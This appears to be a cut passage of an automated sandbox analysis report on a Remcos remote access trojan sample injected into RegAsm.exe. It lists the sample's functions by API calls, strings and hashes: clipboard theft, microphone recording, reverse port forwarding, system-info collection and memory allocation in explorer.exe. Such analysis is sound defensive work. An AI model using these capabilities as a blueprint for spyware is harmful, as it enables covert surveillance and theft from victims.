                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                          • String ID: 0VG$0VG$<$@$Temp
                                          • API String ID: 1704390241-2575729100
                                          • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                          • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                          • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                          • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                          Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenClipboard.USER32 ref: 0041697C
                                          • EmptyClipboard.USER32 ref: 0041698A
                                          • CloseClipboard.USER32 ref: 00416990
                                          • OpenClipboard.USER32 ref: 00416997
                                          • GetClipboardData.USER32 ref: 004169A7
                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                          • CloseClipboard.USER32 ref: 004169BF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                          • String ID: !D@
                                          • API String ID: 2172192267-604454484
                                          • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                          • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                          • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                          • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                          Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                          • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                          Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 004481B5
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 004481C1
                                          • _free.LIBCMT ref: 004481CC
                                          • _free.LIBCMT ref: 004481D7
                                          • _free.LIBCMT ref: 004481E2
                                          • _free.LIBCMT ref: 004481ED
                                          • _free.LIBCMT ref: 004481F8
                                          • _free.LIBCMT ref: 00448203
                                          • _free.LIBCMT ref: 0044820E
                                          • _free.LIBCMT ref: 0044821C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                          Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 100059EA
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 100059F6
                                          • _free.LIBCMT ref: 10005A01
                                          • _free.LIBCMT ref: 10005A0C
                                          • _free.LIBCMT ref: 10005A17
                                          • _free.LIBCMT ref: 10005A22
                                          • _free.LIBCMT ref: 10005A2D
                                          • _free.LIBCMT ref: 10005A38
                                          • _free.LIBCMT ref: 10005A43
                                          • _free.LIBCMT ref: 10005A51
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                          Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Eventinet_ntoa
                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                          • API String ID: 3578746661-3604713145
                                          • Opcode ID: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                                          • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                          • Opcode Fuzzy Hash: a5e6e4f700d91bea08a307d1eb73f3d8dd4849c16ac7e93ec8f1d67ca6239f50
                                          • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                          Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DecodePointer
                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                          • API String ID: 3527080286-3064271455
                                          • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                          • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                          • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                          • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                          Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          • Sleep.KERNEL32(00000064), ref: 0041755C
                                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateDeleteExecuteShellSleep
                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                          • API String ID: 1462127192-2001430897
                                          • Opcode ID: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                                          • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                          • Opcode Fuzzy Hash: e113b56b21605da8d413aa31776797b2f5429e31524f400d16683b1a7354063e
                                          • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                          Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess
                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                          • API String ID: 2050909247-4242073005
                                          • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                          • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                          • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                          • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                          Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                          Download Yara Rule
                                          APIs
                                          • _strftime.LIBCMT ref: 00401D50
                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                          • API String ID: 3809562944-243156785
                                          • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                          • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                          • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                          • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                          Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                          • int.LIBCPMT ref: 00410EBC
                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                          • String ID: ,kG$0kG
                                          • API String ID: 3815856325-2015055088
                                          • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                          • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                          • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                          • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                          Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                          • waveInStart.WINMM ref: 00401CFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                          • String ID: dMG$|MG$PG
                                          • API String ID: 1356121797-532278878
                                          • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                          • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                          • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                          • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                          Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                          • GetMessageA.USER32 ref: 0041D591
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                          • String ID: Remcos
                                          • API String ID: 1970332568-165870891
                                          • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                          • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                          • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                          • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                          Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                          • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                          Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                          • __freea.LIBCMT ref: 00454083
                                          • __freea.LIBCMT ref: 0045408F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                          • String ID:
                                          • API String ID: 201697637-0
                                          • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                          • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                          Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                                          • _free.LIBCMT ref: 00445515
                                          • _free.LIBCMT ref: 0044552E
                                          • _free.LIBCMT ref: 00445560
                                          • _free.LIBCMT ref: 00445569
                                          • _free.LIBCMT ref: 00445575
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast$_abort_memcmp
                                          • String ID: C
                                          • API String ID: 1679612858-1037565863
                                          • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                          • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                          Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: tcp$udp
                                          • API String ID: 0-3725065008
                                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                          Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                          • ExitThread.KERNEL32 ref: 004018F6
                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                          • String ID: PkG$XMG$NG$NG
                                          • API String ID: 1649129571-3151166067
                                          • Opcode ID: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                                          • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
